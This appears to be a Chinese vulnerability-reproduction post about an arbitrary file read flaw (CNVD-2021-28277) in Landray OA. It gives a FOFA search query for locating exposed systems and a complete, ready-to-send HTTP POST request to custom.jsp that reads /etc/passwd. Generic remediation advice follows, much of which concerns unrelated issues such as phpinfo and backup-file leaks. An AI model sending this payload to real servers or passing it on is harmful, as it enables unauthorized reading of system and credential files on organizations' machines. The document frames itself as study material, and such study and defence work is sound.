该文章仅供学习用途使用。
1. 蓝凌OA简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
蓝凌oa办公系统是用于即时办公通讯的oa办公工具。
2.漏洞描述
蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce
CVE编号:
CNNVD编号:
CNVD编号:CNVD-2021-28277
3.影响版本
4.fofa查询语句
app="Landray-OA系统"
5.漏洞复现
漏洞链接:http://www.xxxx.cn:801/sys/ui/extend/varkind/custom.jsp
漏洞数据包:
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: www.xxxx.cn:801
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}
7.整改意见
建议使用蓝凌OA的系统更新系统至最新版本,附录地址:https://www.landray.com.cn/
可以采取以下措施进行修复:
目录遍历:
修改配置文件,去除中间件(如 IIS、 apache、 tomcat)的文件目录索引功能。
设置目录权限,确保只有授权用户才能访问特定目录下的内容。
在每个目录下创建一个空的`index.html`页面,以防止恶意文件被写入。
Phpinfo泄露:
删除使用PHP的`phpinfo()`函数的测试页面,因为这会暴露服务器信息、 Web的绝对路径以及PHP版本等信息。
备份文件泄露:
不应在网站目录下存放网站备份文件或敏感信息的文件。如果需要存储这些文件,应将其放置于web以外且难以猜测的目录中,并使用难以猜解的字符串作为文件名。
内网IP地址泄露:
避免在源代码中注释含有内网IP地址的内容。
关闭Web应用程序/服务器中有问题的详细错误消息。
删除携带内网IP地址的页面,并建立和完善 安全编码策略。
加强编程人员的安全编码意识和系统学习,减少源代码泄露风险。
建立起良好的 代码审核、审查体系,并由专人负责代码审计,增加安全监督环节。
合理配置Web服务器,禁止在数据交互中传输内网IP地址。
